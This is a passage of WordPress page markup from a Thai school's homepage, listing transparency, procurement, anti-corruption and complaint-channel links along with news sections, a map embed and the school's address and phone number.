900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 